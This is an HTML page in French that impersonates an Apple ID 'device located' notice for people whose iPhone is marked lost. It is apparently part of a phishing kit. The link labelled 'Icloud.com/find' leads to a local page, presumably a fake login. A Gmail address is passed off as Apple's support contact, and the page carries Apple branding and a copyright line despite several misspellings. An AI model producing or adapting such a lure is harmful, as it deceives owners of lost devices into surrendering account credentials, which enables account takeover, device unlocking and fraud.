
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Identifiant Apple</title>
<link rel="stylesheet" href="style.css" />
</head>
<body>
  <header>
    <img src="apple-logo.svg" alt="Apple Logo" />
  </header>
  <main>
    <div class="login-container" role="main" aria-label="Page de connexion Apple ID">
      <h1>Appareil localisé</h1>
      <p class="subtitle">Mise à jour concernant votre iphone marqué comme perdu</p>
      <p class="subtitle">Nous vous conctaons au sujet de votre iphone que vous avez signalé comme perdu
        via la fonction "localisé mon iphone".
      </p>
      <p class="subtitle">Nous avons le plaisir de vous informer que votre appareil a été retrouvé et est actuellement
        en sécurité. L'appareil a été localisé et identifié grace aux informations que vous avez fournies lors de l'activation du MODE PERDU.
      </p>
      <p class="subtitle">Voici les prochaines étapes recommandées: 
        <ul>
          <li> Connectez-vous à <a href="index 1.html">Icloud.com/find</a> pour consulter l'emplacement actuel de votre appareil.<br /> </li>
          <li>Si vous n'avez plus accès à votre appareil Apple, vous pouvez également conctacter directement le service Apple de votre pays
            ou Apple directement via notre address email : <a href="mailito:applefindlocalisation@gmail.com">applefindlocalisation@gmail.com</a>
          </li>
        </ul>
      </p>
    </div>
  </main>
  <footer>
    &copy; 2025 Apple Inc. Tous droits réservés.
  </footer>
<script src="script.js"></script>
</body>
</html>
